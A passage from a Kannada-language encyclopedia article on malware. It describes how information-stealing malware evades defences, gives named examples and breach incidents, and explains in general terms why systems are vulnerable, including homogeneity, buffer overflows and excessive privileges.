ಯಶಸ್ವಿ ಇನ್‌ಸ್ಟಾಲೇಷನ್‌ ಬಳಿಕ ಮಾಹಿತಿಯ ಅನಧಿಕೃತ ಉಪಯೋಗವನ್ನು ಕಂಡುಹಿಡಿಯುವ ವ್ಯವಸ್ಥೆಯನ್ನು (ಇಂಟ್ರೂಶನ್ ಡಿಟೆಕ್ಷನ್ ಸಿಸ್ಟಮ್)(IDS) ನಿಷ್ಫಲಗೊಳಿಸುತ್ತದೆ

  • ಗಣನೆಗೆ ಬರುವ ಯಾವುದೇ ಸಂಪರ್ಕ ಅಸಮಂಜಸತೆಗಳಿಲ್ಲ
  • ಮಾಲ್‌ವೇರ್ ಅಂತರಜಾಲ ಮಾಹಿತಿಗಳ ಸಂಚಾರದಲ್ಲಿ ಅಡಗಿಕೊಳ್ಳುತ್ತದೆ
  • ಮಾಹಿತಿಗಳ ಸಂಚಾರ ಮತ್ತು ಸಂಪನ್ಮೂಲಗಳ ಉಪಯೋಗದಲ್ಲಿ ಮಾಲ್‌ವೇರ್ ಅಪಹರಣಕಾರಿಯಾಗಿದೆ.

ಡಿಸ್ಕ್ ಗೂಢಲಿಪೀಕರಣವನ್ನು ನಿಷ್ಫಲಗೊಳಿಸುತ್ತದೆ

  • ಡಿಕ್ರಿಪ್‌ಷನ್ (ಗೂಢಲಿಪೀಕರಣವನ್ನು ಮೂಲರೂಪಕ್ಕೆ ತರುವಿಕೆ) ಮತ್ತು ಪ್ರಸಾರದ ಸಂದರ್ಭದಲ್ಲಿ ಮಾಹಿತಿಯನ್ನು ಕದಿಯಲಾಗುತ್ತದೆ.
  • ಕೀಸ್ಟ್ರೋಕ್‌ಗಳನ್ನು, ಪಾಸ್‌ವರ್ಡ್‌ಗಳನ್ನು, ಮತ್ತು ಸ್ಕ್ರೀನ್‌ಶಾಟ್‌ (ಗಣಕ ಯಂತ್ರದ ಪರದೆಯಲ್ಲಿನ ಚಿತ್ರಣ)ಗಳನ್ನು ಮಾಲ್‌ವೇರ್ ದಾಖಲಿಸಿಕೊಳ್ಳಬಲ್ಲುದು

ಮಾಹಿತಿ ನಷ್ಟ ಪ್ರತಿಬಂಧ (ಡಾಟಾ ಲಾಸ್ ಪ್ರಿವೆನ್ಶನ್) (DLP)ವನ್ನು ನಿಷ್ಫಲಗೊಳಿಸುತ್ತದೆ.

  • ಸೋರಿಕೆ ಪ್ರತಿಬಂಧವು ಸಣ್ಣ ಮಾಹಿತಿಗಳನ್ನು ಸೇರಿಸುವುದರ ಮೇಲೆ ಅವಲಂಭಿಸಿರುತ್ತದೆ, ಎಲ್ಲವೂ ಸೇರಿಸಲ್ಪಡುವುದಿಲ್ಲ
  • ದುಷ್ಟರು ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಿಡಲು ಗೂಢಲಿಪೀಕರಣವನ್ನು ಬಳಸುತ್ತಾರೆ

ಮಾಹಿತಿ ಕದಿಯುವ ಮಾಲ್‌ವೇರ್‌ಗೆ ಉದಾಹರಣೆಗಳು

[ಬದಲಾಯಿಸಿ]
  • ಬ್ಯಾಂಕೊಸ್ ಎನ್ನುವ ಮಾಹಿತಿ ಕಳ್ಳ, ಬಳಕೆದಾರರು ಬ್ಯಾಂಕಿಂಗ್ ಜಾಲತಾಣಗಳನ್ನು ಉಪಯೋಗಿಸುವುದನ್ನೇ ಕಾದು ಕೂತು ಮಾಹಿತಿಯನ್ನು ಕದಿಯುತ್ತದೆ ಮತ್ತು ಬ್ಯಾಂಕ್ ಜಾಲತಾಣಗಳ ಪುಟಗಳಿಗೆ ಮೋಸ ಮಾಡಿ ಸೂಕ್ಷ್ಮ ಮಾಹಿತಿಗಳನ್ನು ಕದಿಯುತ್ತದೆ
  • ಗ್ಯಾಟರ್ ಎನ್ನುವ ಸ್ಪೈವೇರ್, ಜಾಲತಾಣಗಳಲ್ಲಿ ವಿಹರಿಸುವವರ ಚರ್ಯೆಯನ್ನು ಗುಪ್ತವಾಗಿ ನಿಯಂತ್ರಿಸುತ್ತದೆ ಮತ್ತು ಮಾಹಿತಿಯನ್ನು ವಿಶ್ಲೇಷಣೆಗಾಗಿ ಒಂದು ಸರ್ವರ್‌ಗೆ ರವಾನಿಸಿ ತಾನು ಗುರುತಿಸಲ್ಪಟ್ಟ ಪಾಪ್-ಅಪ್ ಆ‍ಯ್‌ಡ್‌ಗಳಿಗೆ ಸರ್ವ್‌ ಮಾಡುತ್ತದೆ.
  • ಲೆಗ್‌ಮಿರ್ ಎನ್ನುವ ಸ್ಪೈವೇರ್, ಆನ್‌ಲೈನ್ ಆಟಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ ಖಾತೆಯ ಹೆಸರು ಮತ್ತು ಪಾಸ್‌ವರ್ಡ್‌ನಂಥ ವೈಯಕ್ತಿಕ ಮಾಹಿತಿಯನ್ನು ಕದಿಯುತ್ತದೆ.
  • ಕೋಸ್ಟ್ ಎನ್ನುವ ಟ್ರೋಜನ್, ಬ್ಯಾಂಕಿಂಗ್ ತಾಣಗಳು ಉಪಯೋಗಿಸಲ್ಪಟ್ಟಾಗ ಅಥಿತೇಯ ಕಡತಗಳು ಬೇರೆಯದೇ ಡಿಎನ್‌ಎಸ್‌ ಸರ್ವರ್‌ಅನ್ನು ಸೂಚಿಸುವಂತೆ ಮಾಡುತ್ತದೆ. ಬಳಿಕ ಆ ಹಣಕಾಸಿನ ಸಂಸ್ಥೆಗಳ ಲಾಗಿನ್ ವಿವರಗಳನ್ನು ಕದಿಯಲು ಅಂಥದ್ದೇ ಮೋಸದ ಲಾಗಿನ್ ಪುಟವನ್ನು ತೆರೆಯುತ್ತದೆ.

ಮಾಹಿತಿ ಕದಿಯುವ ಮಾಲ್‌ವೇರ್‌ಗಳ ಘಟನೆಗಳು

[ಬದಲಾಯಿಸಿ]
  • ಆಲ್ಬರ್ಟ್ ಗೊನ್ಸಾಲೆಜ್, ೨೦೦೬ ಮತ್ತು ೨೦೦೭ರಲ್ಲಿ ೧೭೦ ಮಿಲಿಯಕ್ಕೂ ಹೆಚ್ಚು ಕ್ರೆಡಿಟ್ ಕಾರ್ಡ್ ಸಂಖ್ಯೆಗಳನ್ನು ಕದ್ದು ಮಾರಲು ಮಾಲ್‌ವೇರ್ ಬಳಸಲು ಸಂಚುಮಾಡಿದನೆಂಬ ಆರೋಪದ ಮೇಲೆ ಬಂಧಿಸಲ್ಪಟ್ಟ. ಇದು ಇತಿಹಾಸದಲ್ಲೇ ದೊಡ್ಡ ಗಣಕ ಸಂಬಂಧಿತ ಅಪರಾಧ. ಇವನ ಮೋಸಕ್ಕೊಳಗಾದ ವ್ಯವಹಾರ ಸಂಸ್ಥೆಗಳೆಂದರೆ ( ಬಿಜೆ’ಸ್ ವೋಲ್‌ಸೇಲ್ ಕ್ಲಬ್, ಟಿಜೆಎಕ್ಸ್, ಡಿಎಸ್‌ಡಬ್ಲ್ಯೂ ಶೂ, ಆಫೀಸ್‌ಮ್ಯಾಕ್ಸ್‌, ಬಾರ್ನ್ಸ್‌ ಮತ್ತು ನೋಬೆಲ್‌, ಬೋಸ್ಟನ್‌ ಮಾರ್ಕೆಟ್, ಸ್ಪೋರ್ಟ್ಸ್ ಅಥಾರಿಟಿ ಮತ್ತು ಫಾರ್‌ಎವರ್‌ 21).[೧೦]
  • ಒಂದು ಟ್ರೋಜನ್ ಹಾರ್ಸ್ ಪ್ರೋಗ್ರಾಮು ಮಾನ್‌ಸ್ಟರ್‌ ವರ್ಲ್ಡ್‌ವೈಡ್‌ ಇನ್‌ಕಾರ್ಪೊರೇಷನ್ (Monster Worldwide Inc)ನ ಕೆಲಸ ಹುಡುಕುವ ಸೇವೆಯಲ್ಲಿನ ನೂರಾರು ಸಾವಿರಾರು ಜನರ ೧.೬ ಮಿಲಿಯನ್‌ಗೂ ಮಿಕ್ಕಿದ ದಾಖಲೆಗಳನ್ನು ಕದಿಯಿತು. ಸೈಬರ್ ಅಪರಾಧಿಗಳು ಈ ಮಾಹಿತಿಯನ್ನು ಮಾನ್‌ಸ್ಟರ್.ಕಾಮ್‌ (monster.com)ನ ಬಳಕೆದಾರರ ಗಣಕಗಳಲ್ಲಿ ಇಮೇಲ್‌ ಮೂಲಕ ಮಾಲ್‌ವೇರ್‌ಗಳನ್ನು ಸೇರಿಸಲು ಉಪಯೋಗಿಸುತ್ತಿದ್ದರು.[೧೧]
  • ಮೈನೆಯಲ್ಲಿದ್ದ ದೊಡ್ಡ ಅಂಗಡಿ ಮಳಿಗೆಯಾದ ಹನ್ನಾಫೋರ್ಡ್ ಬ್ರೋಸ್ ಕೊ. ಕಂಪೆನಿಯ ಗ್ರಾಹಕರು, ೪.೨ ಮಿಲಿಯನ್ ಕ್ರೆಡಿಟ್ ಮತ್ತು ಡೆಬಿಟ್ ಕಾರ್ಡ್‌ಗಳನ್ನೊಳಗೊಂಡ ಮಾಹಿತಿ ಭದ್ರತೆಯ ಉಲ್ಲಂಘನೆಗೆ ಬಲಿಪಶುಗಳಾಗಿದ್ದರು. ಕಂಪೆನಿಯು ಹಲವಾರು ವರ್ಗ-ಕ್ರಮದ ಕಾನೂನು ಮೊಕದ್ದಮೆಗಳಿಂದ ಹೊಡೆತ ತಿಂದಿತು.[೧೨]
  • ಟಾರ್ಪಿಗ್ ಟ್ರೋಜನ್ ಸುಮಾರು ೨೫೦,೦೦೦ ಆನ್‌ಲೈನ್ ಬ್ಯಾಂಕ್ ಖಾತೆಗಳ ಲಾಗಿನ್ ವಿವರಗಳನ್ನು, ಹಾಗೆಯೇ ಅಷ್ಟೇ ಸಂಖ್ಯೆಯ ಕ್ರೆಡಿಟ್ ಮತ್ತು ಡೆಬಿಟ್ ಕಾರ್ಡ್‌ಗಳ ವಿವರಗಳನ್ನು ಕದ್ದಿತ್ತು. ಇ-ಮೇಲ್, ಮತ್ತು ಎಫ್‌ಟಿ‌ಪಿ (FTP) ಖಾತೆಗಳಂಥ ಇತರ ಮಾಹಿತಿಗಳೂ ಕೂಡ ಅಸಂಖ್ಯಾತ ಜಾಲತಾಣಗಳಿಂದ ಕದಿಯಲ್ಪಟ್ಟಿತ್ತು.[೧೩]

ಮಾಲ್‌ವೇರ್ ಆಕ್ರಮಣಕ್ಕೆ ಈಡಾಗುವ ಸಂಭವ

[ಬದಲಾಯಿಸಿ]

ಉದ್ದಕ್ಕೂ ಗಮನಿಸಿದಂತೆ, ಈ ಭಾಗದಲ್ಲಿ ದಾಳಿಗೊಳಗಾದ "ಸಿಸ್ಟಮ್" ವಿವಿಧ ರೀತಿಯದ್ದಾಗಿರಬಹುದು, ಉದಾ. ಒಂದು ಗಣಕ ಮತ್ತು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್, ಒಂದು ಸಂಪರ್ಕಜಾಲ ಅಥವಾ ಒಂದು ಅಪ್ಲಿಕೇಶನ್ ಎಂಬುದನ್ನು ಮನಸ್ಸಿನಲ್ಲಿಟ್ಟಿರಬೇಕು.

ಹಲವಾರು ಅಂಶಗಳು ಸಿಸ್ಟಮ್ ಅನ್ನು ಮಾಲ್‌ವೇರ್‌ನ ದಾಳಿಗೊಳಗಾಗುವಂತೆ ಮಾಡುತ್ತವೆ:

  • ಹೋಮೊಜಿನಿಟಿ - ಉದಾಹರಣೆಗೆ ಒಂದು ನೆಟ್‌ವರ್ಕ್‌ನಲ್ಲಿರುವ ಎಲ್ಲಾ ಗಣಕಗಳು ಒಂದೇ ಆಪರೇಟಿಂಗ್‌ ಸಿಸ್ಟಮ್‌ಅನ್ನು ಬಳಸುತ್ತಿರುವಾಗ, ನೀವು ಆ ಆಪರೇಟಿಂಗ್‌ ಸಿಸ್ಟಮ್‌ಅನ್ನು ಚಾಲನೆ ಮಾಡಿರುವ ಗಣಕದೊಳಗೆ ಪ್ರವೇಶಿಸಬಹುದು.
  • ನ್ಯೂನತೆಗಳು - ಆಪರೇಟಿಂಗ್‌ ಸಿಸ್ಟಮ್‌ನಲ್ಲಿರುವ, ಮಾಲ್‌ವೇರ್‌ಗೆ ಅನುಕೂಲ ಮಾಡಿಕೊಡುವ ನ್ಯೂನತೆಗಳು.
  • ಅನಿರ್ದಿಷ್ಟ ಸಂಕೇತ ಲಿಪಿ - ಫ್ಲಾಪಿ ಡಿಸ್ಕ್, ಸಿಡಿ-ರಾಮ್ ಅಥವಾ ಯುಎಸ್‌ಬಿ ಸಾಧನಗಳ ಸಂಕೇತ ಲಿಪಿಗಳು ಬಳಕೆದಾರರ ಒಪ್ಪಿಗೆಯಿಲ್ಲದೆ ಕಾರ್ಯಗತಗೊಳ್ಳಬಹುದು.
  • ಅಧಿಕ-ಸವಲತ್ತು ಹೊಂದಿದ ಬಳಕೆದಾರರು-ಕೆಲವು ಗಣಕಗಳು ಎಲ್ಲಾ ಬಳಕೆದಾರರಿಗೂ ಆಂತರಿಕ ವಿನ್ಯಾಸವನ್ನು ಬದಲಾಯಿಸಲು ಅವಕಾಶ ಮಾಡಿಕೊಡುತ್ತವೆ.
  • ಅಧಿಕ-ಸವಲತ್ತು ಹೊಂದಿದ ಸಂಕೇತ ಲಿಪಿ-ಕೆಲವು ಗಣಕಗಳು ಒಬ್ಬ ಬಳಕೆದಾರನಿಂದ ಕಾರ್ಯಗತಗೊಂಡ ಸಂಕೇತ ಲಿಪಿಗಳಿಗೆ ಆ ಬಳಕೆದಾರನ ಎಲ್ಲಾ ಹಕ್ಕುಗಳನ್ನೂ ಉಪಯೋಗಿಸಿಕೊಳ್ಳಲು ಬಿಡುತ್ತವೆ.

ಸಂಪರ್ಕಜಾಲಗಳ ದಾಳಿಗೀಡಾಗುವಿಕೆಗೆ ಹೆಚ್ಚಾಗಿ ಉದಾಹರಿಸಲ್ಪಡುವ ಕಾರಣವೆಂದರೆ ಹೋಮೊಜಿನಿಟಿ ಅಥವಾ ಏಕರೂಪದ ತಂತ್ರಾಂಶ.[೧೪] ಉದಾಹರಣೆಗೆ, ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಂಡೋಸ್ ಅಥವಾ ಆ‍ಯ್‌ಪಲ್ ಮ್ಯಾಕ್, ಸ್ವಾಮ್ಯದಲ್ಲಿರುವ ಮಾರುಕಟ್ಟೆಯ ಬಹುದೊಡ್ಡ ಪಾಲನ್ನು ಹೊಂದಿವೆ. ಅಕ್ರಮವಾಗಿ ನುಸುಳುವವರಿಗೆ ಬಹುಸಂಖ್ಯೆಯ ಗಣಕಗಳನ್ನು ನಾಶಮಾಡುವ ಸಾಧ್ಯತೆ ಇರುತ್ತದೆ. ಆದರೆ ಯಾವುದೇ ಏಕರೂಪದ ತಂತ್ರಾಂಶವೂ ಸಮಸ್ಯೆಯೇ. ಬದಲಾಗಿ, ಪ್ರಬಲ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗಾಗಿ ಇನ್‌ಹೋಮೊಜೆನಿಟಿ (ವಿವಿಧತೆ)ಯನ್ನು ಪರಿಚಯಿಸುವುದು, ಕೇವಲ ಪುಷ್ಟಿಗೋಸ್ಕರ, ತರಬೇತಿ ಮತ್ತು ಮೇಲ್ವಿಚಾರಣೆಯ ಅಲ್ಪಾವಧಿ ವೆಚ್ಚವನ್ನು ಹೆಚ್ಚಿಸಬಹುದು. ಆದಾಗ್ಯೂ, ಕೆಲವು ವಿವಿಧತೆಯ ಜಾಲಘಟಕಗಳನ್ನು ಹೊಂದಿರುವುದು ಸಂಪರ್ಕಜಾಲ ಪೂರ್ಣ ಪ್ರಮಾಣದಲ್ಲಿ ಸ್ಥಗಿತಗೊಳ್ಳುವುದನ್ನು ನಿವಾರಿಸಬಲ್ಲುದು ಹಾಗೂ ಆ ಜಾಲಘಟಕಗಳು ಇತರ, ತೊಂದರೆಗೊಳಗಾದ ಜಾಲಘಟಕಗಳಿಗೆ ಚೇತರಿಸಿಕೊಳ್ಳಲು ಸಹಕರಿಸಲು ಬಿಡಬಲ್ಲುದು. ಈ ರೀತಿಯ ಪ್ರತ್ಯೇಕ, ಕಾರ್ಯಾತ್ಮಕ ಪುನರಾವರ್ತನೆಯು ಪೂರ್ಣ ಪ್ರಮಾಣದ ಸ್ಥಗಿತಗೊಳ್ಳುವಿಕೆಯ ವೆಚ್ಚವನ್ನು, "ಒಂದೇ ಬುಟ್ಟಿಯಲ್ಲಿ ಎಲ್ಲಾ ಮೊಟ್ಟೆಗಳು" ಎಂಬಂಥ ಸಮಸ್ಯೆಗೆ ಕಾರಣವಾದ ಹೋಮೊಜೆನಿಟಿಯನ್ನು ತಡೆಯಬಲ್ಲುದು.

ಹೆಚ್ಚಿನ ಗಣಕಗಳು, ಮಾಲ್‌ವೇರ್‌ ಮೋಸದಿಂದ ಬಳಸಿಕೊಳ್ಳಬಲ್ಲಂಥ ತೊಂದರೆಗಳನ್ನು, ಅಥವಾ ನಿಯಮಗಳಿಂದ ತಪ್ಪಿಸಿಕೊಳ್ಳುವ ಉಪಾಯಗಳನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ. ಒಂದು ಸಾಮಾನ್ಯ ಉದಾಹರಣೆಯೆಂದರೆ, ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಿಡಲು ಮೆಮೊರಿಯ ಒಂದು ಸಣ್ಣ ಭಾಗದಲ್ಲಿ ರಚಿತವಾದ ಅಂತರ ಸಂಪರ್ಕ ಸಾಧನವು ಉಪಯೋಗಿಸುವವರಿಗೆ ಹಿಡಿಯುವುದಕ್ಕಿಂತ ಹೆಚ್ಚಿನ ಮಾಹಿತಿಯನ್ನು ಪೂರೈಸಿಬಿಡುವ ತಾತ್ಕಾಲಿಕ ಸಂಗ್ರಹ-ಅತಿಕ್ರಮಣ ನ್ಯೂನತೆ. ಹೀಗೆ ಪೂರೈಸಿದಾಗ, ಈ ಹೆಚ್ಚುವರಿ ಮಾಹಿತಿಯು ಅಂತರ್‌ ಸಂಪರ್ಕ ಸಾಧನದ ಕಾರ್ಯದ ವಿನ್ಯಾಸದ ಮೇಲೆ ಬರೆಯಲ್ಪಡುತ್ತದೆ (ಹಿಂದಿನ ತಾತ್ಕಾಲಿಕ ಸಂಗ್ರಹ ಮತ್ತು ಇತರೆ ಮಾಹಿತಿಯ ಕೊನೆಗೊಳ್ಳುವಿಕೆ). ಈ ರೀತಿ, ಮಾಲ್‌ವೇರ್ ನಿಜವಾದ ಮಾಹಿತಿಯೊಂದಿಗಿನ ಸರಿಯಾದ ಸಂಕೇತ ಲಿಪಿಯನ್ನು ಬದಲಾಯಿಸಿ, ಬಫರ್‌ನ ಹೊರಗೆ ಲೈವ್‌ ಮೆಮೊರಿಗೆ ಕಾಪಿ ಮಾಡಲಾದ ತನ್ನದೇ ಪೇಲೋಡ್‌ ಸಂಕೇತಗಳಿಂದ ದುರಾಗ್ರಹ ಸಂಕೇತ ಲಿಪಿ ಕಾರ್ಯರೂಪಗೊಳ್ಳುವಂತೆ ಗಣಕವನ್ನು ಒತ್ತಾಯಿಸಬಲ್ಲುದು.

ಮೂಲತಃ ಗಣಕಗಳು ಫ್ಲಾಪಿ ಡಿಸ್ಕ್‌ನಿಂದ ಬೂಟ್‌ ಮಾಡಬೇಕು (ಪ್ರಾರಂಭಿಸಬೇಕು), ಮತ್ತು ಇತ್ತೀಚಿನವರೆಗೆ ಇದು ಸಾಮಾನ್ಯವಾದ ಪೂರ್ವನಿಯೋಜಿತ ಬೂಟ್ ಸಾಧನವಾಗಿತ್ತು. ಅರ್ಥಾತ್ ಹಾಳಾದ ಫ್ಲಾಪಿ ಡಿಸ್ಕ್ ಗಣಕ ಬೂಟ್ ಆಗುವ ಸಂದರ್ಭದಲ್ಲಿ ಅದನ್ನು ಕೆಡಿಸುವ ಸಾಧ್ಯತೆಯಿತ್ತು, ಮತ್ತು ಇದು ಸಿಡಿಗಳಿಗೂ ಅನ್ವಯಿಸುತ್ತದೆ. ಈಗ ಇದು ಕಡಿಮೆಯಾಗಿದ್ದರೂ, ಪೂರ್ವನಿಯೋಜಿತವಾದದ್ದನ್ನು ಬದಲಾಯಿಸಿದ್ದಾರೆ ಎಂಬುದನ್ನು ಮರೆಯುವ ಸಾಧ್ಯತೆಯಿದೆ ಮತ್ತು ತೆಗೆದು ಹಾಕಬಹುದಾದ ಮಾಧ್ಯಮದಿಂದ ಬೂಟ್ ಆಗುವುದನ್ನು ಬಿಐಒಎಸ್‌ ಖಚಿತಪಡಿಸುವುದು ವಿರಳ.

ಕೆಲವು ಗಣಕಗಳಲ್ಲಿ ವಿನ್ಯಾಸದಲ್ಲಿಯೇ, ಅಡ್‌ಮಿನಿಸ್ಟ್ರೇಟರ್‌ಗಳಲ್ಲದ ಬಳಕೆದಾರರು ಅಧಿಕ-ಸವಲತ್ತುಗಳನ್ನು ಹೊಂದಿದ್ದಾರೆ, ಅಂದರೆ ಆಂತರಿಕ ವಿನ್ಯಾಸವನ್ನು ಬದಲಾಯಿಸುವ ಅವಕಾಶ ಹೊಂದಿದ್ದಾರೆ. ಕೆಲವು ಸನ್ನಿವೇಶಗಳಲ್ಲಿ, ಬಳಕೆದಾರರು ಯೋಗ್ಯವಲ್ಲದ ರೀತಿಯಲ್ಲಿ ಅಡ್‌ಮಿನಿಸ್ಟ್ರೇಟರ್‌ ಅಥವಾ ಅವರಿಗೆ ಸಮನಾದ ಸ್ಥಾನವನ್ನು ಕೊಡಲ್ಪಟ್ಟಿರುವ ಕಾರಣದಿಂದ ಅಧಿಕ-ಸವಲತ್ತುಗಳನ್ನು ಹೊಂದಿರುತ್ತಾರೆ. ಇದು ಪ್ರಾಥಮಿಕವಾಗಿ ಒಂದು ಕಾನ್‌ಫಿಗರೇಷನ್‍ನ ನಿರ್ಧಾರ, ಆದರೆ ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಂಡೋಸ್ ಸಿಸ್ಟಮ್‌ಗಳಲ್ಲಿ ಪೂರ್ವನಿಯೋಜಿತ ಕಾನ್‌ಫಿಗರೇಷನ್‌ನ ಉದ್ದೇಶ ಬಳಕೆದಾರರಿಗೆ ಅಧಿಕ-ಸವಲತ್ತುಗಳನ್ನು ನೀಡುವುದು. ಹಳೆ ಯಂತ್ರಗಳ ಮೇಲೆ ಹೊಸ ಯಂತ್ರಗಳ ಭದ್ರತಾ ಕಾನ್‌ಫಿಗರೇಷನ್‌ ಹೊಂದಿಕೆಯಾಗುವಂತೆ ಆದ್ಯತೆ ನೀಡಲು ಮೈಕ್ರೋಸಾಫ್ಟ್ ನಿರ್ಧರಿಸಿದುದರಿಂದ [ಸೂಕ್ತ ಉಲ್ಲೇಖನ ಬೇಕು]ಹಾಗೂ ಸಾಮಾನ್ಯ ಅನ್ವಯಗಳು ಕಡಿಮೆ-ಸವಲತ್ತುಳ್ಳ ಬಳಕೆದಾರರನ್ನು ಗಮನದಲ್ಲಿರಿಸದೆ ರಚಿತವಾದ್ದರಿಂದ ಈ ಪರಿಸ್ಥಿತಿ ಉಂಟಾಗಿದೆ. ಸವಲತ್ತು ಅಭಿವೃದ್ಧಿಯಾಗುವಿಕೆಯ ಮೋಸದ ಬಳಕೆ ಹೆಚ್ಚಾಗಿರುವ ಕಾರಣ ಈ ಆದ್ಯತೆಯು ಮೈಕ್ರೋಸಾಫ್ಟ್ ವಿಂಡೋಸ್ ವಿಸ್ತಾದ ಬಿಡುಗಡೆಯತ್ತ ಬದಲಾಯಿತು. ಪರಿಣಾಮವಾಗಿ, ಹೆಚ್ಚಿನ ಸವತ್ತು ಅಗತ್ಯವಿರುವ (ಅಧಿಕ-ಸವಲತ್ತುಳ್ಳ ಸಂಕೇತ ಲಿಪಿ), ಅಸ್ತಿತ್ವದಲ್ಲಿರುವ ಹಲವಾರು ಅಪ್ಲಿಕೇಷನ್‍ಗಳು ವಿಸ್ತಾದೊಂದಿಗೆ ಹೊಂದಾಣಿಕೆಯ ಸಮಸ್ಯೆಗಳನ್ನು ಎದುರಿಸಬಹುದು. ಆದಾಗ್ಯೂ, ವಿಸ್ತಾದ ಬಳಕೆದಾರರ ಖಾತೆಯ ನಿಯಂತ್ರಣವು, ಪೂರ್ವಾರ್ಜಿತ ಅಪ್ಲಿಕೇಷನ್‌ಗಳಲ್ಲಿ ಅಂತರ್ಗತವಾಗಿರುವ ಸೌಲಭ್ಯಾಧಾರಿತ ಉಪಯೋಗದ ಸಮಸ್ಯೆಯನ್ನು ನಿವಾರಿಸುವ ಆಧಾರದಂತೆ ವರ್ತಿಸುತ್ತ, ವರ್ಚುವಲೈಜೇಷನ್ ಮೂಲಕ ಕಡಿಮೆ-ಸವಲತ್ತುಳ್ಳ ಬಳಕೆದಾರರಿಗೆ ವಿನ್ಯಾಸ ಮಾಡದ ಅಪ್ಲಿಕೇಷನ್‌ಗಳನ್ನು ನಿವಾರಿಸಲು ಪ್ರಯತ್ನಿಸುತ್ತದೆ.

ಅಧಿಕ-ಸವಲತ್ತುಳ್ಳ ಸಂಕೇತ ಲಿಪಿಯಂತೆ ಕೆಲಸ ಮಾಡುತ್ತಿರುವ ಮಾಲ್‌ವೇರ್, ಗಣಕವನ್ನು ಬುಡಮೇಲು ಮಾಡಲು ಈ ಸೌಲಭ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳಬಲ್ಲದು. ಪ್ರಸ್ತುತ ಜನಪ್ರಿಯವಾಗಿರುವ ಹೆಚ್ಚಿನ ಎಲ್ಲಾ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗಳು, ಹಾಗೂ ಹಲವು ಆದೇಶ ಸರಣಿಯ ಅಪ್ಲಿಕೇಷನ್‌‌ಗಳೂ, ಒಬ್ಬ ಬಳಕೆದಾರ ಸಂಕೇತ ಲಿಪಿಯನ್ನು ಕಾರ್ಯರೂಪಗೊಳಿಸಿದಾಗ ಕಂಪ್ಯೂಟರ್ ಆ ಬಳಕೆದಾರನ ಎಲ್ಲಾ ಹಕ್ಕುಗಳನ್ನೂ ಆ ಸಂಕೇತ ಲಿಪಿಗೆ ಅನುಮತಿಸುತ್ತದೆ ಎಂಬ ದೃಷ್ಟಿಯಿಂದ, ಸಂಕೇತ ಲಿಪಿಗೆ ಅತ್ಯಧಿಕ ಸೌಲಭ್ಯಗಳನ್ನು ನೀಡಿವೆ. ಇದು, ರಹಸ್ಯವಾಗಿಡಲು ಸಾಧ್ಯವಿರುವ ಅಥವಾ ಇಲ್ಲದ ಈ-ಮೇಲ್‌ ಅಟ್ಯಾಚ್‌ಮೆಂಟ್‌ ರೂಪದಲ್ಲಿ ಬಳಕೆದಾರರು ಮಾಲ್‌ವೇರ್‌ನ ದಾಳಿಗೊಳಗಾಗುವಂತೆ ಮಾಡುತ್ತದೆ.

ಈ ರೀತಿಯ ಘಟನೆಗಳಿರುವುದರಿಂದ, ಬಳಕೆದಾರರು ನಂಬಲರ್ಹ ಅಟ್ಯಾಚ್‌ಮೆಂಟ್‌ಗಳನ್ನು ಮಾತ್ರ ತೆರೆಯಬೇಕೆಂದು ಮತ್ತು ನಂಬಲರ್ಹವಲ್ಲದ ಮೂಲಗಳಿಂದ ಸ್ವೀಕರಿಸಿದ ಸಂಕೇತ ಲಿಪಿಯ ಬಗ್ಗೆ ಜಾಗರೂಕರಾಗಿರುವಂತೆ ಎಚ್ಚರಿಸಲಾಗಿದೆ. ಯಂತ್ರದ ಚಾಲನೆಗೆ ಅಧಿಕ ಸವಲತ್ತುಗಳನ್ನು ಕೇಳುವ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗಳನ್ನು ವಿನ್ಯಾಸಗೊಳಿಸುವುದೂ ಸಾಮಾನ್ಯ, ಇವುಗಳನ್ನು ಹೆಚ್ಚು ಹೆಚ್ಚು ಯಂತ್ರಾಂಶ ತಯಾರಕರು ಪೂರೈಸಬೇಕಾಗುತ್ತದೆ.

ಹೆಚ್ಚಿನ-ಸವಲತ್ತುಗಳಿರುವ ಕೋಡ್‌ಗಳನ್ನು ತೆಗೆದುಹಾಕುವುದು

[ಬದಲಾಯಿಸಿ]

ಹೆಚ್ಚಿನ ಸವಲತ್ತುಗಳಿರುವ ಕೋಡ್‌ಗಳು, ಬಹಳಷ್ಟು ಪ್ರೊಗ್ರಾಮುಗಳನ್ನು ಗಣಕ ಜೊತೆಗೆ ಬಟವಾಡೆ ಮಾಡುವ ಅಥವಾ ತಾವೇ ಬರೆದುಕೊಳ್ಳುತ್ತಿದ್ದ ಸಮಯದಿಂದಲೂ ಇವೆ, ಮತ್ತು ಅದನ್ನು ರಿಪೇರಿ ಮಾಡಲು ಹೋಗುವುದರಿಂದ ಬಹುತೇಕ ವೈರಸ್‌-ವಿರೋಧಿ ತಂತ್ರಾಂಶಗಳನ್ನು ತದ್ವಿರುದ್ಧ ಮಾಡಿಬಿಡಬಹುದು. ಆದರೆ, ಬಳಕೆದಾರನ ಇಂಟರ್‌ಫೇಸ್ ಮತ್ತು ಗಣಕ ನಿರ್ವಹಣೆಯಲ್ಲಿ ಗಮನಾರ್ಹ ಪರಿಣಾಮಗಳನ್ನು ಹೊಂದಿವೆ.

